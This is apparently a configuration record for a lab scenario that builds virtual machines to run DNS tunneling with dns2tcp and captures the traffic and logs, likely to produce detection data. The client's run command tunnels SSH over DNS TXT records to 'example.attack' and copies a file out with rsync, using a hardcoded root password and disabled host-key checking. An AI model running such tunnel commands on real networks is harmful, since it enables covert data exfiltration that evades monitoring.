.metadata

execution_time: 2022-04-01 16:11:46.082707

variables: {"record_type": "TXT", "compression": "-c", "passphrase": "0xDEADBEEF"}

scenario: {"name": "DNS Tunnel Scenario", "description": "\"This Scenario runs through multiple DNS tunneling \"\n", "provisioner": "vagrant", "use_default_templates": true, "components": [{"name": "BIND9", "ipv4_address": "192.168.0.10", "description": "Installation of BIND9 DNS server.", "image": "ubuntu/focal64", "setup": {"type": "ansible", "val": "bind9_playbook"}, "run": {"type": "shell", "val": "systemctl restart named"}, "artifacts_to_collect": [{"type": "pcap", "val": ["tcpdump -i any -s 0 -n -w /tmp/dns.pcap port 53"]}, {"type": "files", "val": ["/var/cache/bind/query*.log", "/tmp/filebeat.json*", "/tmp/dns.pcap"]}, {"type": "elastic", "val": ["192.168.1.248:9200"]}, {"type": "filebeat", "val": ["/var/cache/bind/query*.log"]}]}, {"name": "dns2tcp_server", "ipv4_address": "192.168.0.20", "description": "This sets up the DNS2TCP server.", "image": "ubuntu/focal64", "setup": {"type": "ansible", "val": "dns2tcp_server_setup"}, "run": {"type": "shell", "val": "sudo apt install -y socat;\n#nohup asciinema rec /tmp/dns2tcp_server_TXT.cast -c \\'set -x; dns2tcpd -d 1 -f /opt/dns2tcpdrc & sleep 1\\'"}, "artifacts_to_collect": [{"type": "files", "val": ["/tmp/*.cast"]}]}, {"name": "dns2tcp_client", "ipv4_address": "192.168.0.30", "description": "This sets up the DNS2TCP client.", "image": "ubuntu/focal64", "setup": {"type": "shell", "val": "sudo apt-get install -y dns2tcp sshpass asciinema;"}, "run": {"type": "shell", "val": "set -x; dns2tcpc -z example.attack -k 0xDEADBEEF 192.168.0.10 -r ssh -l 12345 -c -T TXT & sleep 1; rsync -P --rsh=\"sshpass -p root ssh -l root -oStrictHostKeyChecking=no -p 12345\" 127.0.0.1:/root/test-file /tmp/"}, "artifacts_to_collect": [{"type": "files", "val": ["/tmp/*.cast"]}, {"type": "cli_recording", "val": ["/tmp/dns2tcp_client_TXT_compressed_0xDEADBEEF.cast"]}], "depends_on": ["dns_attack_server", "dns_server"]}]}